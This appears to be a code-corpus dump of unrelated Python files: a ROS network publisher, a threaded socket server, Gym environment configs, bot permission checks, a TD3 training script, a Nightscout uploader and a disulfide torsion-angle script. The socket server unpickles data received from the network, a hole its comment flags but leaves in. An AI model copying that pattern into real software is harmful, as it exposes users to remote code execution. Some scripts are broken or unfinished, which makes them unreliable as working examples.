        except queue.Full as ex:
            ## TODO handle queue full issue - shouldn't hit this too often, we either need more workers or too much data is being sent
            # self.get_logger().error(f'Queue is full! {str(ex)}')
            self.metric_handler.increment_dropped()
        except Exception as ex:
            # some other error
            self.get_logger().error(f'Error queuing message {str(ex)}')

    def send_message(self, message, worker_id):
        """Send ``message`` on this worker's socket and record send metrics."""
        if self.mode != 'tcp' and self.mode != 'udp':
            raise Exception(f'Mode is set to {self.mode}. Accepted modes are "udp" or "tcp"')
        if self.mode == 'tcp':
            bytesSent, time_taken = self.sockets[worker_id].send_message(message)
        elif self.mode == 'udp':
            bytesSent, time_taken = self.sockets[worker_id].sendto(message)
        # time_taken in seconds floating point
        if bytesSent and bytesSent > 0:
            self.metric_handler.handle_message(worker_id, bytesSent, time_taken)

    def shutdown(self):
        """Stop the worker loop, close every worker socket, and join the threads."""
        self.running = False
        for i in range(0, self.worker_count):
            try:
                self.sockets[i].close()
            except Exception as ex:
                self.get_logger().warning(f"Exception closing down worker socket {i}, exception: {str(ex)}")
        for i in range(0, self.worker_count):
            self.get_logger().info(f"Joining worker thread {i}")
            # 5 second wait before skipping the thread
            self.workers[i].join(5)
def main(args=None):
    """Entry point: spin the publisher node and clean up its threads on exit.

    BUGFIX: SIGINT raises KeyboardInterrupt, which does NOT inherit from
    Exception, so the old ``except Exception`` never caught Ctrl-C and
    shutdown()/destroy_node() never ran in that case. Cleanup now lives in a
    ``finally`` block so it runs on every exit path.
    """
    rclpy.init(args=args)
    network_publisher = NetworkPublisher()
    try:
        rclpy.spin(network_publisher)
    except KeyboardInterrupt:
        print("!! SIGINT received - attempting to clean up remaining threads...please wait...")
    except Exception:
        traceback.print_exc()
        print("!! SIGINT received - attempting to clean up remaining threads...please wait...")
    finally:
        network_publisher.shutdown()
        network_publisher.destroy_node()
        try:
            # the rclpy context may already be invalid on the error path
            rclpy.shutdown()
        except Exception:
            pass

if __name__ == '__main__':
    main()
|
991,491 | 2d570b9ad381032d32b0f2afa7957d1c604bb054 | import threading
import time
class myThread(threading.Thread):
    """Serve one accepted client connection on a background thread.

    Args:
        s: a LISTENING socket (must support accept()).
        name: thread name (stored on the Thread instance).
    """
    def __init__(self, s, name):
        threading.Thread.__init__(self)
        self.s = s
        self.name = name

    def run(self):
        # BUGFIX: pickle was never imported in this module, so run() raised
        # NameError on first use; import it locally to keep the class
        # self-contained.
        import pickle
        c, addr = self.s.accept()
        while True:
            try:
                msg = "server data"
                c.send(pickle.dumps(msg))
                # SECURITY: pickle.loads on data received from the network is
                # unsafe with untrusted peers — flagging, not replacing.
                msg = pickle.loads(c.recv(1024))
                print(msg)
            except Exception as e:
                # BUGFIX: a dead/closed connection used to spin forever
                # printing the same error; bail out of the loop instead.
                print(e)
                break
def handle_client(msg):
    """Repeatedly print *msg* (never returns).

    Fixes: the parameter used to be named ``str``, shadowing the builtin, and
    a ``count`` local was assigned but never used.

    NOTE(review): this function is never called in this module and loops
    forever by design?? Confirm intent before relying on it.
    """
    while True:
        print(msg)
# NOTE(review): myThread's first argument is used as a socket (self.s.accept()),
# but the string "kp" is passed here, so every thread will raise AttributeError
# as soon as run() executes — presumably placeholder/demo code; confirm intent.
# Also note `t` is rebound for each thread and none of the threads are joined.
t=myThread("kp","client2")
t.start()
t=myThread("kp","client3")
t.start()
t=myThread("kp","client1")
t.start()
991,492 | 7d2865faaf0d041cefae0b4b141871652de43dfc | """
https://github.com/openai/gym/wiki/Table-of-environments
https://github.com/openai/gym/tree/master/gym/envs -
check gym/gym/envs/__init__.py for solved properties (max_episode_steps, reward_threshold, optimum).
Solved: avg_score >= reward_threshold, over 100 consecutive trials.
"Unsolved environment" - doesn't have a specified reward_threshold at which it's considered solved.
Environments:
Classic Control - CartPole, Pendulum, MountainCarContinuous. # TODO: Acrobot.
Box2D - LunarLander, LunarLanderContinuous, BipedalWalker.
Atari - Breakout, SpaceInvaders.
####################################
Atari environments:
Atari environments must be trained on a GPU (will basically take thousands of years on CPU).
observation's shape: (210, 160, 3) # (H, W, C)
screen_size = (210, 160) # (H, W)
image_channels = 3 # RGB
observation pre-process # reshaping (usually)
1. the atari screen should be truncated (cropped) - since there's no need for the score, etc...
2. remove color by getting the mean of the 3 channels (axis=2 means along the RGB values)
input_type = INPUT_TYPE_STACKED_FRAMES
"""
import numpy as np
import gym
from reinforcement_learning.deep_RL.const import INPUT_TYPE_OBSERVATION_VECTOR, INPUT_TYPE_STACKED_FRAMES, \
ATARI_FRAMES_STACK_SIZE, ATARI_IMAGE_CHANNELS_GRAYSCALE
from reinforcement_learning.utils.utils import normalize
class BaseEnv:
    """Default environment hooks: pass observations and rewards through unchanged.

    Concrete environments override these to derive a custom state (e.g. frame
    stacking) or to shape rewards.
    """

    @staticmethod
    def get_state(observation, prev_s):
        # identity mapping — the raw observation is the state
        return observation

    @staticmethod
    def update_reward(reward, done, info):
        # identity mapping — the raw reward is used as-is
        return reward
# ClassicControl:
class CartPole(BaseEnv):
    """CartPole-v1 ("Inverted Pendulum") configuration.

    A pole is attached by an un-actuated joint to a cart on a frictionless
    track; actions push the cart left (0) or right (1), and the reward is +1
    per time-step the pole stays upright. The episode ends when the pole tips
    more than ~15 degrees or the cart leaves [-2.4, 2.4].
    Observation: [x, x_dot, theta, theta_dot] — Box(4,).
    Solved (gym registry): v0 — 200 steps / 195.0; v1 — 500 steps / 475.0
    over 100 consecutive trials.
    """

    def __init__(self):
        self.name = 'Cart Pole'
        self.file_name = 'cart-pole-v1'
        self.env = gym.make('CartPole-v1')
        self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
        self.input_dims = [4]                       # Box(4,)
        self.is_discrete_action_space = True
        self.n_actions = 2                          # Discrete(2)
        self.action_space = list(range(self.n_actions))
        self.GAMMA = 0.99
        self.EPS_MIN = None
        self.memory_size = 1000000
        self.memory_batch_size = 64
class Pendulum(BaseEnv):
    """Pendulum-v0 configuration.

    Continuous observation space Box(3,); continuous action space Box(1,)
    with action bound 2.
    Gym registry: Pendulum-v0 — max_episode_steps = 200 (no reward threshold);
    related: InvertedPendulum-v2 (1000 / 950.0),
    InvertedDoublePendulum-v2 (1000 / 9100.0).
    """

    def __init__(self):
        self.name = 'Pendulum'
        self.file_name = 'pendulum-v0'
        self.env = gym.make('Pendulum-v0')
        self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
        self.input_dims = [3]                       # Box(3,)
        self.is_discrete_action_space = False
        self.n_actions = 1                          # Box(1,)
        self.action_boundary = 2
        self.GAMMA = 0.99
        self.EPS_MIN = None
        self.memory_size = 1000000
        self.memory_batch_size = 64
class MountainCarContinuous(BaseEnv):
    """MountainCarContinuous-v0 configuration.

    Continuous observation space Box(2,); continuous action space Box(1,)
    with action bound 1.
    Gym registry: max_episode_steps = 999, reward_threshold = 90.0.
    """

    def __init__(self):
        self.name = 'Mountain Car Continuous'
        self.file_name = 'mountain-car-continuous-v0'
        self.env = gym.make('MountainCarContinuous-v0')
        self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
        self.input_dims = [2]                       # Box(2,)
        self.is_discrete_action_space = False
        self.n_actions = 1                          # Box(1,)
        self.action_boundary = 1
        self.GAMMA = 0.99
        self.EPS_MIN = None
        self.memory_size = 1000000
        self.memory_batch_size = 64
# Box2D:
class LunarLander(BaseEnv):
    """LunarLander-v2 configuration.

    Continuous observation space Box(8,); discrete action space with 4 actions.
    Gym registry: max_episode_steps = 1000, reward_threshold = 200.
    """

    def __init__(self):
        self.name = 'Lunar Lander'
        self.file_name = 'lunar-lander-v2'
        self.env = gym.make('LunarLander-v2')
        self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
        self.input_dims = [8]                       # Box(8,)
        self.is_discrete_action_space = True
        self.n_actions = 4                          # Discrete(4)
        self.action_space = list(range(self.n_actions))
        self.GAMMA = 0.99
        self.EPS_MIN = None
        self.memory_size = 1000000
        self.memory_batch_size = 64
class LunarLanderContinuous(BaseEnv):
    """
    Lunar Lander Continuous environment configuration.
    Solved:
    gym/gym/envs/__init__.py :
        LunarLanderContinuous-v2: max_episode_steps = 1000, reward_threshold = 200
    Continuous observation space (8D).
    Continuous action space (2D).
    """

    def __init__(self):
        self.name = 'Lunar Lander Continuous'
        self.file_name = 'lunar-lander-continuous-v2'  # used for result/model file naming
        self.env = gym.make('LunarLanderContinuous-v2')
        self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
        self.input_dims = [8]  # Box(8,)
        self.is_discrete_action_space = False
        self.n_actions = 2  # Box(2,)
        self.action_boundary = [1, 1]  # per-dimension max |action| magnitude
        self.GAMMA = 0.99  # reward discount factor
        self.EPS_MIN = None  # no epsilon floor (continuous action space)
        self.memory_size = 1000000  # replay buffer capacity (transitions)
        self.memory_batch_size = 64
class BipedalWalker(BaseEnv):
    """
    Bipedal Walker environment configuration.
    Solved:
    gym/gym/envs/__init__.py :
        BipedalWalker-v3: max_episode_steps = 1600, reward_threshold = 300
        BipedalWalkerHardcore-v3: max_episode_steps = 2000, reward_threshold = 300
    Continuous observation space (24D).
    State vector consists of:
        hull angle speed
        angular velocity
        horizontal speed
        vertical speed
        position of joints
        joints angular speed
        legs contact with ground
        10 lidar rangefinder measurements
    There are no coordinates in the state vector.
    Continuous action space (4D).
    DDPG - 5K episodes take around 12h, and it takes around 15-20K to get score 255
    """

    def __init__(self):
        self.name = 'Bipedal Walker'
        self.file_name = 'bipedal-walker-v2'  # used for result/model file naming
        # NOTE(review): docstring above cites the -v3 thresholds, but the
        # environment created here is -v2 — confirm which version is intended.
        self.env = gym.make('BipedalWalker-v2')
        self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
        self.input_dims = [24]  # Box(24,)
        self.is_discrete_action_space = False
        self.n_actions = 4  # Box(4,)
        self.action_boundary = [1, 1, 1, 1]  # per-dimension max |action| magnitude
        self.GAMMA = 0.99  # reward discount factor
        self.EPS_MIN = None  # no epsilon floor (continuous action space)
        self.memory_size = 1000000  # replay buffer capacity (transitions)
        self.memory_batch_size = 64
# Atari:
def stack_frames(stacked_frames, frame):
    """Maintain a rolling stack of recent frames to give the agent a sense
    of motion. ``frame`` is the newest pre-processed observation and
    ``stacked_frames`` is the previous stack (None at episode start)."""
    if stacked_frames is not None:
        # Slide the window: drop the oldest channel, append the new frame.
        return np.concatenate((stacked_frames[:, :, 1:], frame), axis=2)
    # Episode start: no history yet, so fill the stack with the first frame.
    return np.repeat(frame, repeats=ATARI_FRAMES_STACK_SIZE, axis=2)
class Breakout(BaseEnv):
    """
    Breakout environment configuration.
    Continuous observation space (210,160,3 D).
    Discrete action space (1D).
    Actions (4)
    """

    def __init__(self):
        self.name = 'Breakout'
        self.file_name = 'breakout-v0'
        self.env = gym.make('Breakout-v0')
        self.input_type = INPUT_TYPE_STACKED_FRAMES
        self.image_channels = ATARI_IMAGE_CHANNELS_GRAYSCALE
        self.relevant_screen_size = (180, 160)  # frame size after dropping the top 30 rows
        self.input_dims = (*self.relevant_screen_size, ATARI_FRAMES_STACK_SIZE)  # Box(210,160,3)
        self.is_discrete_action_space = True
        self.n_actions = 3  # Discrete(4); action 0 is excluded below
        self.action_space = [1, 2, 3]
        self.GAMMA = 0.99
        self.EPS_MIN = None
        self.memory_size = 6000  # saving transitions (stacked frames): 6-7K --> ~16Gb RAM, 25K --> ~48Gb RAM
        self.memory_batch_size = 32

    def get_state(self, observation, prev_s):
        """Pre-process the raw frame and push it onto the frame stack."""
        return stack_frames(prev_s, self.preprocess_image(observation))

    def preprocess_image(self, o):
        """Crop, optionally grayscale, and normalize a raw screen frame."""
        cropped = o[30:, :]  # drop the top 30 pixel rows (presumably the score area)
        if self.image_channels == ATARI_IMAGE_CHANNELS_GRAYSCALE:
            # Collapse RGB into a single channel, keeping a trailing channel axis.
            cropped = np.mean(cropped, axis=2)[:, :, np.newaxis]
        return normalize(cropped)
class SpaceInvaders(BaseEnv):
    """
    Space Invaders environment configuration.
    Continuous observation space (210,160,3 D).
    Discrete action space (1D).
    Actions (6): none (0), fire (1), right (2), left (3), right & fire (4), left & fire (5)
    """

    def __init__(self):
        self.name = 'Space Invaders'
        self.file_name = 'space-invaders-v0'
        self.env = gym.make('SpaceInvaders-v0')
        self.input_type = INPUT_TYPE_STACKED_FRAMES
        self.image_channels = ATARI_IMAGE_CHANNELS_GRAYSCALE
        self.relevant_screen_size = (185, 95)  # frame size after the crop below
        self.input_dims = (*self.relevant_screen_size, ATARI_FRAMES_STACK_SIZE)  # Box(210,160,3)
        self.is_discrete_action_space = True
        self.n_actions = 6  # Discrete(6)
        self.action_space = list(range(self.n_actions))
        self.GAMMA = 0.95  # 0.9 in PG tf.
        self.EPS_MIN = None
        self.memory_size = 5000
        self.memory_batch_size = 32

    def get_state(self, observation, prev_s):
        """Pre-process the raw frame and push it onto the frame stack."""
        return stack_frames(prev_s, self.preprocess_image(observation))

    def preprocess_image(self, o):
        """Crop, optionally grayscale, and normalize a raw screen frame."""
        cropped = o[15:200, 30:125]  # crop to the relevant play area
        if self.image_channels == ATARI_IMAGE_CHANNELS_GRAYSCALE:
            # Collapse RGB into a single channel, keeping a trailing channel axis.
            cropped = np.mean(cropped, axis=2)[:, :, np.newaxis]
        return normalize(cropped)

    @staticmethod
    def update_reward(reward, done, info):
        """
        Penalize the agent for losing (0 number of lives).
        ALE is the emulator on which the open ai gym's Atari library is built.
        """
        lost_the_game = done and info['ale.lives'] == 0
        return reward - 100 if lost_the_game else reward
|
991,493 | 630b2bb65e1686cfd2e3782e219caa24056c892a | """
Permission Related Code
"""
from .helpers import *
from .imports import *
class StaffMember(BaseModel):
    """Represents a staff member in Fates List"""
    name: str  # display name (mapped from the "fname" field of the perm payload)
    id: Union[str, int]  # user id, as reported by the perm payload
    perm: int  # numeric permission level; compared against base_perm in is_staff
    staff_id: Union[str, int]  # staff record id from the perm payload
async def is_staff_unlocked(bot_id: int, user_id: int):
    """Return truthy if this staff member has unlocked access to this bot,
    i.e. the redis key fl_staff_access-{user_id}:{bot_id} exists."""
    return await redis_db.exists(f"fl_staff_access-{user_id}:{bot_id}")
async def is_bot_admin(bot_id: int, user_id: int):
    """Return True if the user may administer the bot.

    True when either (a) the user is staff with perm level >= 4 and has
    unlocked access to this bot, or (b) the user is listed as an owner of
    the bot in the bot_owner table. Returns False for non-numeric user ids.
    """
    try:
        user_id = int(user_id)
    except ValueError:
        # A non-numeric id can never match an owner or staff record.
        return False
    if (await is_staff(staff_roles, user_id, 4))[0] and (await is_staff_unlocked(bot_id, user_id)):
        return True
    check = await db.fetchval("SELECT COUNT(1) FROM bot_owner WHERE bot_id = $1 AND owner = $2", bot_id, user_id)
    # Idiom fix: direct comparison instead of if/else returning literals.
    return check > 0
async def is_staff(staff_json: dict, user_id: int, base_perm: int, json: bool = False, *, redis=None) -> Union[bool, int, StaffMember]:
    """Resolve a user's staff permission level via the GETPERM IPC call.

    Returns a 3-tuple: (meets base_perm, perm level, StaffMember) — the last
    element is a plain dict when json=True. Negative user ids and users with
    no perm payload resolve to the "Unknown" member with perm 0.
    """
    redis = redis if redis else redis_db
    if user_id < 0:
        # Negative ids are sentinel/invalid users; skip the IPC round-trip.
        staff_perm = None
    else:
        staff_perm = await redis_ipc_new(redis, "GETPERM", args=[str(user_id)])
    if not staff_perm:
        staff_perm = {"fname": "Unknown", "id": "0", "staff_id": "0", "perm": 0}
    else:
        staff_perm = orjson.loads(staff_perm)
    sm = StaffMember(name = staff_perm["fname"], id = staff_perm["id"], staff_id = staff_perm["staff_id"], perm = staff_perm["perm"]) # Initially
    # Idiom fix: direct boolean instead of `True if ... else False`.
    rc = sm.perm >= base_perm
    if json:
        return rc, sm.perm, sm.dict()
    return rc, sm.perm, sm
991,494 | d89d454eca7ff2db6405b5539702046543a60dac | a,b = input().split()
# Compare the number of distinct characters in the two input words (a, b).
# Fixes: set(a) iterates the string directly, so the intermediate list() was
# redundant, and the count of b no longer shadows the word itself.
distinct_a = len(set(a))
distinct_b = len(set(b))
if distinct_a == distinct_b:
    print("yes")
else:
    print("no")
|
991,495 | 378a85f3f2960c3f61aed8d79c09bf7acc9e3a16 | import numpy as np
import torch
import gym
import argparse
import os
import utils
import TD3
import kerbal_rl.env as envs
def generate_input(obs):
    """Flatten a kerbal_rl observation triple into a 7-tuple state vector.

    obs[0]: vessel-like object exposing dry_mass, mass, max_thrust, thrust
    obs[1]: flight-like object exposing mean_altitude, vertical_speed
    obs[2]: goal scalar

    Fixes: the local result was named `input`, shadowing the builtin, and was
    wrapped in redundant double parentheses.
    """
    vessel = obs[0]
    flight = obs[1]
    goal = obs[2]
    return (
        flight.mean_altitude,
        flight.vertical_speed,
        vessel.dry_mass,
        vessel.mass,
        vessel.max_thrust,
        vessel.thrust,
        goal,
    )
# Runs policy for X episodes and returns average reward
def evaluate_policy(policy, eval_episodes=1):
    """Run `policy` in the module-global `env` for `eval_episodes` episodes
    and return the average total reward.

    Bug fix: the flattened state was built once before the step loop and
    never refreshed, so the policy acted on the initial observation at every
    step. The state is now regenerated from each new observation.
    """
    avg_reward = 0.
    for _ in range(eval_episodes):
        obs = env.reset()
        done = False
        state = generate_input(obs)
        while not done:
            action = policy.select_action(np.array(state))
            obs, reward, done, _ = env.step(action)
            state = generate_input(obs)  # refresh the state for the next step
            avg_reward += reward
    avg_reward /= eval_episodes
    print ("---------------------------------------")
    print ("Evaluation over %d episodes: %f" % (eval_episodes, avg_reward))
    print ("---------------------------------------")
    return avg_reward
if __name__ == "__main__":
    # TD3 training loop for the kerbal_rl hover_v0 environment.
    parser = argparse.ArgumentParser()
    parser.add_argument("--policy_name", default="TD3")  # Policy name
    parser.add_argument("--seed", default=0, type=int)  # Sets Gym, PyTorch and Numpy seeds
    parser.add_argument("--start_timesteps", default=2e4, type=int)  # How many time steps purely random policy is run for
    parser.add_argument("--eval_freq", default=5e2, type=float)  # How often (time steps) we evaluate
    parser.add_argument("--max_timesteps", default=1e6, type=float)  # Max time steps to run environment for
    parser.add_argument("--save_models", action="store_true")  # Whether or not models are saved
    parser.add_argument("--expl_noise", default=0.1, type=float)  # Std of Gaussian exploration noise
    parser.add_argument("--batch_size", default=200, type=int)  # Batch size for both actor and critic
    parser.add_argument("--discount", default=0.99, type=float)  # Discount factor
    parser.add_argument("--tau", default=0.005, type=float)  # Target network update rate
    parser.add_argument("--policy_noise", default=0.2, type=float)  # Noise added to target policy during critic update
    parser.add_argument("--noise_clip", default=0.5, type=float)  # Range to clip target policy noise
    parser.add_argument("--policy_freq", default=2, type=int)  # Frequency of delayed policy updates
    args = parser.parse_args()

    file_name = "%s_%s_%s" % (args.policy_name, 'hover_v0', str(args.seed))
    print ("---------------------------------------")
    print ("Settings: %s" % (file_name))
    print ("---------------------------------------")

    # Output directories for evaluation curves and (optionally) model weights.
    if not os.path.exists("./results"):
        os.makedirs("./results")
    if args.save_models and not os.path.exists("./pytorch_models"):
        os.makedirs("./pytorch_models")

    # env = kerbal_rl.make('hover_v0')
    env = envs.hover_v0()

    # Set seeds
    torch.manual_seed(args.seed)
    np.random.seed(args.seed)

    state_dim = 7  # custom: length of the tuple built by generate_input
    action_dim = 1
    max_action = env.action_max

    # Initialize policy
    policy = TD3.TD3(state_dim, action_dim, max_action)
    replay_buffer = utils.ReplayBuffer()

    # Evaluate untrained policy
    evaluations = [evaluate_policy(policy)]

    total_timesteps = 0
    timesteps_since_eval = 0
    episode_num = 0
    done = True  # forces an env.reset() on the first loop iteration

    while total_timesteps < args.max_timesteps:
        if done:
            # Train once per finished episode, on as many gradient steps as
            # the episode had timesteps (TD3's episodic training schedule).
            if total_timesteps != 0:
                print('Total T : ', total_timesteps, ' Episode Num : ', episode_num, ' Episode : ', episode_timesteps, ' Reward : ', episode_reward)
                policy.train(replay_buffer, episode_timesteps, args.batch_size, args.discount, args.tau, args.policy_noise, args.noise_clip, args.policy_freq)
            # Evaluate episode
            if timesteps_since_eval >= args.eval_freq:
                timesteps_since_eval %= args.eval_freq
                evaluations.append(evaluate_policy(policy))
                if args.save_models: policy.save(file_name, directory="./pytorch_models")
                np.save("./results/%s" % (file_name), evaluations)
            # Reset environment
            obs = env.reset()
            done = False
            episode_reward = 0
            episode_timesteps = 0
            episode_num += 1
            obs = generate_input(obs)  # flatten the raw observation triple
        # Select action randomly or according to policy
        if total_timesteps < args.start_timesteps:
            # Warm-up phase: purely random actions to seed the replay buffer.
            action = env.sample_action_space()
        else:
            action = policy.select_action(np.array(obs))
            if args.expl_noise != 0:
                # Gaussian exploration noise, clipped to the valid action range.
                action = (action + np.random.normal(0, args.expl_noise, size=env.action_space)).clip(env.action_min, env.action_max)
        # Perform action
        new_obs, reward, done, _ = env.step(action)
        new_obs = generate_input(new_obs)
        done_bool = float(done)
        episode_reward += reward
        # Store data in replay buffer
        replay_buffer.add((obs, new_obs, action, reward, done_bool))
        obs = new_obs
        print('goal : ', obs[6])  # index 6 is the goal element of the flattened state
        episode_timesteps += 1
        total_timesteps += 1
        timesteps_since_eval += 1

    # Final evaluation
    evaluations.append(evaluate_policy(policy))
    if args.save_models: policy.save("%s" % (file_name), directory="./pytorch_models")
    np.save("./results/%s" % (file_name), evaluations)
|
991,496 | 015a82703bd5e83ae8d4baa835cf4dfc3cb9d648 | import json
import arrow
import logging
from ..parser.tconnect import TConnectEntry
from ..parser.nightscout import NightscoutEntry
logger = logging.getLogger(__name__)
def process_cgm_events(readingData):
    """Parse raw t:connect reading entries into CGM event dicts."""
    return [TConnectEntry.parse_reading_entry(raw) for raw in readingData]
"""
Given reading data and a time, finds the BG reading event which would have
been the current one at that time. e.g., it looks before the given time,
not after.
This is a heuristic for checking whether the BG component of a bolus was
manually entered or inferred based on the pump's CGM.
"""
def find_event_at(cgmEvents, find_time):
find_t = arrow.get(find_time)
events = list(map(lambda x: (arrow.get(x["time"]), x), cgmEvents))
events.sort()
closestReading = None
for t, r in events:
if t > find_t:
break
closestReading = r
return closestReading
"""
Given processed CGM data, adds reading entries to Nightscout.
"""
def ns_write_cgm_events(nightscout, cgmEvents, pretend=False):
    """Upload processed CGM events to Nightscout, skipping anything at or
    before the most recent entry already uploaded.

    Returns the number of entries uploaded (or that would be uploaded when
    pretend=True, which performs no writes).
    """
    logger.debug("ns_write_cgm_events: querying for last uploaded entry")
    last_upload = nightscout.last_uploaded_bg_entry()
    last_upload_time = None
    if last_upload:
        last_upload_time = arrow.get(last_upload["dateString"])
    logger.info("Last Nightscout CGM upload: %s" % last_upload_time)

    add_count = 0
    for event in cgmEvents:
        created_at = event["time"]
        # Deduplicate: drop events not strictly newer than the last upload.
        if last_upload_time and arrow.get(created_at) <= last_upload_time:
            if pretend:
                # Skips are only logged in pretend mode to keep real runs quiet.
                logger.info("Skipping CGM event before last upload time: %s" % event)
            continue
        entry = NightscoutEntry.entry(
            sgv=event["bg"],
            created_at=created_at
        )
        add_count += 1
        logger.info(" Processing cgm reading: %s entry: %s" % (event, entry))
        if not pretend:
            nightscout.upload_entry(entry, entity='entries')
    return add_count
|
991,497 | 6ca2be7f4bf28f42e6dc9dc89f276f36225d0e99 | # Classify images of dogs & cats
# dataset is Kaggle's Dogs vs Cats
# First, clustering the SURF features for all images
# Second, represent each image by its feature counts of clusters (BOF)
# Finally, logistic regression to classify dog or cat |
991,498 | 31280b53a821644a1ba4a8b72599857a80c3b427 | # Filename: calc_ssXtorisons.py
# Author: Evelyne Deplazes
# Date: May 5, 2018
# Script to calculate the five torsion angles that are defined by the
# two residues that form a disulfide bond (see below for definition of
# torsion angles)
# the script relies on the definition of the disulfide bonds by the keyword SSBOND
# in the HEADER of the PDB file (example below)
# SSBOND 1 CYS A 3 CYS A 20 1555 1555 2.03
# SSBOND 2 CYS A 7 CYS A 16 1555 1555 2.03
# the script requires the standard python libraries numpy, sys, math and glob
# as well as the library MDAnalysis https://www.mdanalysis.org
# The script loops through all .pdb files in a the current folder.
# For each .pdb file the script calculates the average for each
# of the five torsion angles.
# for PDB files with multiple models, the CA-CA distances are
# averaged over all models.
# the script produces the following output files:
# histograms for each of the five torsion angles calculated from all .pdb files
# ----- defintion of torsion angles -----
# the CYS residues that form the SSbond define 5 torsion angles
# formed by the N CA CB and S atoms of residues Cys i and Cys j
# torsions and atoms involved (based on schematic in Fig 1 in
# Srinivasan et al, J Peptide Research, 1990
# Xss = CBi Si Sj CBj
# Xi1 = Ni CAi CBi Si
# Xj1 = Nj CAj CBj Sj
# Xi2 = CAi CBi Si Sj
# Xj2 = CAj CBj Sj Si
import glob
import re
import numpy as np
import sys, os
import math as math
import numpy as np
import MDAnalysis as MDA
import MDAnalysis.analysis.distances as distances
# Accumulators for each torsion angle, pooled over all ss-bonds in all pdb files.
Xss_all = []
Xi1_all = []
Xi2_all = []
Xj1_all = []
Xj2_all = []
# One histogram output file per torsion angle.
f1=str("ssXtorsions_Xss_hist.dat")
outfile1=open(f1, 'w')
f2=str("ssXtorsions_Xi1_hist.dat")
outfile2=open(f2, 'w')
f3=str("ssXtorsions_Xj1_hist.dat")
outfile3=open(f3, 'w')
f4=str("ssXtorsions_Xi2_hist.dat")
outfile4=open(f4, 'w')
f5=str("ssXtorsions_Xj2_hist.dat")
outfile5=open(f5, 'w')
for pdb_file in glob.glob('*.pdb'):
    print "processing pdb file", pdb_file, "................"
    multiple_chains = 0
    # check if file has multiple chains, if so, skip this pdb file
    p1 = re.compile('(COMPND)[a-z]*')
    infile=open(pdb_file,'r') #open pdb file
    line=infile.readline()
    while (line):
        if p1.match(line):
            #print line
            # 'B;' in a COMPND record marks the presence of a second chain
            if line.find('B;') > 0:
                print "found more than one chain in pdb file"
                multiple_chains=1
        line =infile.readline()
    if multiple_chains == 1:
        print "pdb file excluded due to multiple chains", pdb_file
    else:
        #print "calculating ssbond torsion angle for pdb file", pdb_file, "................"
        #sys.exit()
        # process pdb file
        # find number of ss-bonds in the structure
        # by looking for the SSBOND keyword in the .pdb file
        # for each ssbond, get residue numbers involved
        p = re.compile('(SSBOND)[a-z]*')
        count_ssbonds = 0
        resid_i=[]
        resid_j=[]
        infile=open(pdb_file,'r') #open pdb file
        line=infile.readline()
        while (line):
            if p.match(line):
                count_ssbonds = count_ssbonds + 1
                # NOTE(review): these fixed two-character column slices only
                # capture residue numbers up to two digits; verify against the
                # PDB SSBOND record column specification for larger proteins.
                resid_i.append(int(line[19:21]))
                resid_j.append(int(line[33:35]))
            line =infile.readline()
        #print pdb_file, count_ssbonds
        #print resid1, resid2
        # load the pdb file with MDAnalysis
        # select protein and find number of frames/models
        u = MDA.Universe(pdb_file)
        peptide=u.select_atoms("protein").residues
        num_models = len(u.trajectory)
        # for each ssbond, loop through pdb models and
        # calculate the torsion angles
        for ssbond in range(0,count_ssbonds):
            # select CA in ssbonds
            #print "------------", ssbond
            Xss = []
            Xi1 = []
            Xj1 = []
            Xi2 = []
            Xj2 = []
            # Build MDAnalysis selection strings for the atoms of both residues.
            selection = 'resid {} and name {}'
            CAi = selection.format(resid_i[ssbond], 'CA')
            CAj = selection.format(resid_j[ssbond], 'CA')
            CBi = selection.format(resid_i[ssbond], 'CB')
            CBj = selection.format(resid_j[ssbond], 'CB')
            Si = selection.format(resid_i[ssbond], 'SG')
            Sj = selection.format(resid_j[ssbond], 'SG')
            Ni = selection.format(resid_i[ssbond], 'N')
            Nj = selection.format(resid_j[ssbond], 'N')
            # Xss = CBi Si Sj CBj
            Xss_atoms = [CBi, Si, Sj, CBj]
            print Xss_atoms
            # Xi1 = Ni CAi CBi Si
            Xi1_atoms = [Ni, CAi, CBi, Si]
            # Xj1 = Nj CAj CBj Sj
            Xj1_atoms = [Nj, CAj, CBj, Sj]
            # Xi2 = CAi CBi Si Sj
            Xi2_atoms = [CAi, CBi, Si, Sj]
            # Xj2 = CAj CBj Sj Si
            Xj2_atoms = [CAj, CBj, Sj, Si]
            Xss_angle = sum([u.select_atoms(atom) for atom in Xss_atoms]) # sum of Atoms creates an AtomGroup
            Xss_angle = Xss_angle.dihedral # convert AtomGroup to Dihedral object
            Xi1_angle = sum([u.select_atoms(atom) for atom in Xi1_atoms])
            Xi1_angle = Xi1_angle.dihedral
            Xj1_angle = sum([u.select_atoms(atom) for atom in Xj1_atoms])
            Xj1_angle = Xj1_angle.dihedral
            Xi2_angle = sum([u.select_atoms(atom) for atom in Xi2_atoms])
            Xi2_angle = Xi2_angle.dihedral
            Xj2_angle = sum([u.select_atoms(atom) for atom in Xj2_atoms])
            Xj2_angle = Xj2_angle.dihedral
            # Accumulate the angle value for every model (frame) in the file.
            for ts in u.trajectory[0:num_models:1]:
                Xss.append(Xss_angle.value())
                Xss_all.append(Xss_angle.value())
                Xi1.append(Xi1_angle.value())
                Xi1_all.append(Xi1_angle.value())
                Xj1.append(Xj1_angle.value())
                Xj1_all.append(Xj1_angle.value())
                Xi2.append(Xi2_angle.value())
                Xi2_all.append(Xi2_angle.value())
                Xj2.append(Xj2_angle.value())
                Xj2_all.append(Xj2_angle.value())
# NOTE(review): len(Xss_all) counts angle samples (ss-bonds x models), not
# distinct ss-bonds — confirm the intended meaning of this message.
print "collected data on torsion angles for", len(Xss_all), "ss-bonds from ", len(glob.glob('*.pdb')), "pdb files"
# get histogram for Xss_all
hist, bin_edges = np.histogram(Xss_all, bins=50, density=True)
for i in range(0,len(hist)):
    hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
    outfile1.write(hist_string)
outfile1.close()
hist, bin_edges = np.histogram(Xi1_all, bins=50, density=True)
for i in range(0,len(hist)):
    hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
    outfile2.write(hist_string)
outfile2.close()
hist, bin_edges = np.histogram(Xj1_all, bins=50, density=True)
for i in range(0,len(hist)):
    hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
    outfile3.write(hist_string)
outfile3.close()
